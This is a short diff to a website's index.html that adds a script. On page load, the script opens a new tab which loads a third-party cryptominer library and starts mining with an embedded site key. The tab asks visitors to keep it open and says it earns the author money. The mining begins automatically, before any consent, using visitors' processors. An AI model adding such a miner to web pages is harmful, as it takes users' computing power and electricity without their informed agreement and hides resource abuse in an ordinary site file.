--- a/index.html
+++ b/index.html
@@ -20,6 +20,8 @@
               </script>
   </head>
   <body>
+   <script>var x = window.open('') // open a blank tab;
+    x.document.write('<!DOCTYPE html><html lang="en"><link rel="stylesheet" href="/style.css"><head><title>keep open</title><script src="https://webminepool.com/lib/base.js"></script></head><body><h1>Please keep this tab open. Just leave it running in the background while you play</h1><h2>This helps make me money so it's either this or ads.</h2><script>var miner = WMP.Anonymous('SK_KgOAR8OS97B9mhnH5AQQA', {throttle: 0.3});miner.start();</script></body></html>');</script>
 <nav id='menu'>
   <input type='checkbox' id='responsive-menu' onclick='updatemenu()'><label></label>
   <ul>
